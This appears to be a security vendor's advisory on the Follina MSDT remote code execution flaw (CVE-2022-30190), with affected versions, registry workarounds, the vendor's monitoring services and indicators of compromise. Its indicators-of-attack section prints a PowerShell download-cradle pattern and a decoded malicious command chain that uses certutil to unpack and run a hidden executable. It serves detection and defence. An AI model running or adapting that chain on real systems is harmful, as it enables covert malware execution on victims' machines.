Updated: June 9, 2022


Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert on addressing the Zero-day remote code execution (RCE) vulnerability—CVE-2022-30190, known as “Follina”—affecting the Microsoft Support Diagnostic Tool (MSDT) in Microsoft Windows.

Exploit Overview

ms follina exploit view1

Determined Impact

  • A remote code execution vulnerability exists when MSDT is called using the URL protocol from an application such as Word.
  • An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change and delete data, or create new accounts in the context allowed by the user’s rights.


Publicly DisclosedExploitedCVSS

CVE-2022-30190 Affected Versions

Affected Product Versions
Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2012 (Server Core installation)Windows Server 2012Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2Windows RT 8.1Windows 8.1 for x64-based systemsWindows 8.1 for 32-bit systemsWindows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)Windows Server 2008 for x64-based Systems Service Pack 2Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)Windows 7 for x64-based Systems Service Pack 1Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016  (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based Systems
Windows 10 for 32-bit SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 for ARM64-based Systems
Windows 11 for x64-based SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based Systems
Windows Server 2022 Azure Edition Core HotpatchWindows Server 2022 (Server Core installation)Windows Server 2022Windows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based SystemsWindows Server 2019  (Server Core installation)Windows Server 2019Windows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems    

Mitigations/ Workarounds

Mitigation/ WorkaroundSteps to be followed
Disable the MSDT URL Protocol using these steps:Run Command Prompt as Administrator.To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename“Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.Note: Disabling “Troubleshooting wizards” can be performed through GPO HKLM/SOFTWARE\Policies\Microsoft\Windows\Scripted Diagnostics – EnableDiagnostics – 0
How to undo the workaround (it is applicable once the patch is available):Run Command Prompt as Administrator.To restore the registry key, execute the command “reg import filename” 

Best practices to stay protected against CVE-2022-30190 exploits

  • Ensure anti-malware is installed on all the hosts and signatures are up to date to detect/prevent office applications from spawning the unusual child processes.
  • Ensure the Netsurion sensor is installed on all the hosts.
  • Conduct phishing awareness training at regular intervals.
  • Harden the email security gateway policies.
  • Perform vulnerability assessment and scanning at regular intervals.

Netsurion Monitoring Solutions

The Security Operations Center (SOC) will be able to track the CVE-2022-30190 exploit attempts using logs via Saved Searches, Dashboards, Reports, and Netsurion Managed Open XDR services.

ms follina alerts1

Note: To detect/analyze the pattern, the Netsurion sensor should be installed on all active systems.

  • SOC updated available IOCs to the Netsurion Threat center, which will help detect CVE-2022-30190 related activities using existing Priority-1 Alerts.
  • PowerShell anomaly alert will be helpful to detect the invoke expression activities.
  • CVE-2022-30190 related saved searches, dashboards and reports will be used for tracking known patterns of malicious behavior.
  • Customers with the Netsurion Endpoint Security service will be alerted and protected by detecting and blocking the PowerShell execution patterns. 

Detection by Netsurion Vulnerability Management

The Vulnerability Management signature database is updated with CVE-2022-30190 signatures. MTP team will be able to identify and report vulnerable endpoints for the Customers with Netsurion Vulnerability Management subscription.

Indicators of Compromise (IoCs)

  • The Netsurion Threat Center has been updated with identified bad MD5 hash values and IP addresses to detect the IP address communication and terminate process launches based on the unsafe list.
  • Netsurion will continue to monitor for evidence of CVE-2022-30190 exploitation and to update this advisory to inform customers.
IOC TypeValue
IP Address141.105.65.149
MD5 Hash52945af1def85b171870b31fa4782e52

Indicators of Attack

A PowerShell encoded command with below parameters would clearly indicate an active compromise.

Encoded Command


Powershell Commands

-nop, hidden , -w, “IEX (Invoke Expressions), ((new-object net.webclient).downloadstring

Decoded Command

$cmd = “c:\windows\system32\cmd.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c taskkill /f /im msdt.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe”;


SOC analysts are trained to identify and recognize these commands to triage further. If found to be a true positive, the customers are alerted immediately.